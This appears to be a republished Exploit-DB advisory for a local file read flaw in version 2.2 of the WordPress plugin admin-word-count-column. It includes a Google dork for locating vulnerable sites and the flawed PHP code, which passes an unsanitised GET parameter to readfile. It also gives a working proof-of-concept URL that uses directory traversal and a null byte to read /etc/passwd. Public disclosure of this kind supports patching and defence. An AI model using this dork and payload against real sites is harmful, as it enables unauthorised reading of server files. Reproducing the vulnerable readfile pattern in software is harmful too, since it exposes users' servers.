[webapps] WordPress Plugin admin-word-count-column 2.2 - Local File Read
2022-3-30 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:19 收藏
2022-3-30 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:19 收藏
# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
# Version: 2.2
# Contact me: h [at] spidersilk.com
# PHP version: 5.3.2 or below
# Vulnerable File: plugins/admin-word-count-column/download-csv.php
# Vulnerable Code:
```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```
# Proof of Concept:
localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.
文章来源: https://www.exploit-db.com/exploits/50845
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh